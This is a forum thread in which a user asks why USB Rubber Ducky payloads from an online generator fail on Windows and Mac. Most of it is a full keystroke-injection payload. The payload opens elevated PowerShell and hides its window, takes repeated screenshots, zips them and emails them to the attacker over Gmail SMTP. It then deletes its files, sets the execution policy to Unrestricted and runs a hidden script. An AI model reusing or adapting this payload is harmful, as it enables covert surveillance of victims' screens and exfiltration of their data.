duckyman662

I've used http://ducktoolkit-411.rhcloud.com/Home.jsp I tried just one option of each of these, mixed up a couple as well, but still nothing works

Yeah that works ok, I've had much longer delays than that though for literally every single other script and it wont work.

I did one from the ducky payload generator with the longest possible delay and it still does this..

I tried on fast, slow, windows, mac, nothing has worked, it just renames files, opens up random documents, in windows typically its opening notepad, on mac, it opens up random folders and renames them... Very displeased with this...

Also on both win/mac it just opens random files OR renames random program names/folders in Mac.

I get this error for just the screenshot with maximum delay selected from the duck toolkit website. 40000 united states, on my laptop. No idea why it doesnt work.. edit: thread title says 32 bit vista. I also tried on two separate computers, around 2010 laptops and a macbook air, no luck.

DELAY 2750 GUI r DELAY 2750 STRING powershell Start-Process notepad -Verb runAs ENTER DELAY 2750 ALT y DELAY 2750 ENTER ALT SPACE DELAY 2750 STRING m DELAY 2750 DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW ENTER STRING $folderDateTime = (get-date).ToString('d-M-y HHmmss') ENTER STRING $userDir = (Get-ChildItem env:\userprofile).value + '\Ducky Report ' + $folderDateTime ENTER STRING $fileSaveDir = New-Item ($userDir) -ItemType Directory ENTER STRING $date = get-date ENTER STRING $style = "<style> table td{padding-right: 10px;text-align: left;}#body {padding:50px;font-family: Helvetica; font-size: 12pt; border: 10px solid black;background-color:white;height:100%;overflow:auto;}#left{float:left; background-color:#C0C0C0;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#right{background-color:#C0C0C0;float:right;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#center{background-color:#C0C0C0;width:98%;height:300px;border: 4px solid black;padding:10px;overflow:scroll;margin:10px;} </style>" ENTER STRING $Report = ConvertTo-Html -Title 'Recon Report' -Head $style > $fileSaveDir'/ComputerInfo.html' ENTER STRING $Report = $Report +"<div id=body><h1>Duck Tool Kit Report</h1><hr size=2><br><h3> Generated on: $Date </h3><br>" ENTER STRING $jpegSaveDir = New-Item $fileSaveDir'/Screenshots' -ItemType Directory ENTER STRING $displayInfo = Get-WmiObject Win32_DesktopMonitor | Where {$_.Name -eq 'Default Monitor'}| Select ScreenHeight, ScreenWidth ENTER STRING $displayWidth = $displayInfo.ScreenWidth ENTER STRING $displayHeight = $displayInfo.ScreenHeight ENTER STRING [System.Reflection.Assembly]::LoadWithPartialName("System.Drawing") ENTER STRING $x = 0 ENTER STRING do { Start-Sleep -Seconds 60 ENTER STRING $jpegName = (get-date).ToString('HHmmss') ENTER STRING $image = new-object System.Drawing.Bitmap 1366 ,768 ENTER STRING $imageSize = New-object System.Drawing.Size $displayWidth,$displayHeight ENTER STRING $screen = [System.Drawing.Graphics]::FromImage($image) ENTER STRING $screen.copyfromscreen(0,0,0,0, $imageSize,([System.Drawing.CopyPixelOperation]::SourceCopy)) ENTER STRING $image.Save("$jpegSaveDir/$jpegName.jpeg",([system.drawing.imaging.imageformat]::jpeg)); ENTER STRING $x++ } while ($x -ne 15); ENTER STRING $Report >> $fileSaveDir'/ComputerInfo.html' ENTER STRING function copy-ToZip($fileSaveDir){ ENTER STRING $srcdir = $fileSaveDir ENTER STRING $zipFile = 'C:\Windows\Report.zip' ENTER STRING if(-not (test-path($zipFile))) { ENTER STRING set-content $zipFile ("PK" + [char]5 + [char]6 + ("$([char]0)" * 18)) ENTER STRING (dir $zipFile).IsReadOnly = $false} ENTER STRING $shellApplication = new-object -com shell.application ENTER STRING $zipPackage = $shellApplication.NameSpace($zipFile) ENTER STRING $files = Get-ChildItem -Path $srcdir ENTER STRING foreach($file in $files) { ENTER STRING $zipPackage.CopyHere($file.FullName) ENTER STRING while($zipPackage.Items().Item($file.name) -eq $null){ ENTER STRING Start-sleep -seconds 1 }}} ENTER STRING copy-ToZip($fileSaveDir) ENTER STRING $SMTPServer = 'smtp.gmail.com' ENTER STRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587) ENTER STRING $SMTPInfo.EnableSsl = $true ENTER STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential(''secret', 'secretpassword'); ENTER STRING $ReportEmail = New-Object System.Net.Mail.MailMessage ENTER STRING $ReportEmail.From = ''secretemailhere@gmail.com'' ENTER STRING $ReportEmail.To.Add('secretemailhere@gmail.com') ENTER STRING $ReportEmail.Subject = 'Duck Toolkit Recon Report' ENTER STRING $ReportEmail.Body = 'Please find attached your reconnaissance report.' ENTER STRING $ReportEmail.Attachments.Add('C:\Windows\Report.zip') ENTER STRING $SMTPInfo.Send($ReportEmail) ENTER STRING remove-item $fileSaveDir -recurse ENTER STRING remove-item 'C:\Windows\Report.zip' ENTER STRING Remove-Item $MyINvocation.InvocationName ENTER CTRL S DELAY 2750 STRING C:\Windows\config-5077a.ps1 ENTER DELAY 2750 ALT F4 DELAY 2750 GUI r DELAY 2750 STRING powershell Start-Process cmd -Verb runAs ENTER DELAY 2750 ALT y DELAY 2750 STRING mode con:cols=14 lines=1 ENTER ALT SPACE DELAY 2750 STRING m DELAY 2750 DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW ENTER STRING powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false ENTER DELAY 2750 STRING powershell.exe -windowstyle hidden -File C:\Windows\config.ps1 ENTER

The only payload that has worked is the Hello World payload, the rest will open random files and such.

I created a payload through duck toolkit and I choose the e-mail options, I enter my information correctly and when I run the duck on the computer for some reason different payloads open random folders and I get no reports, I wanted screenshots sent to my e-mail several times but no luck, I tried creating different payloads but it wont work for some reason. I drag and drop the bin file onto the SD card, insert into the ducky and put the ducky into the usb potr, but it runs really quickly despite slower delays like 30 extra seconds, proper keyboard layout (USA) and it's not working, any advice?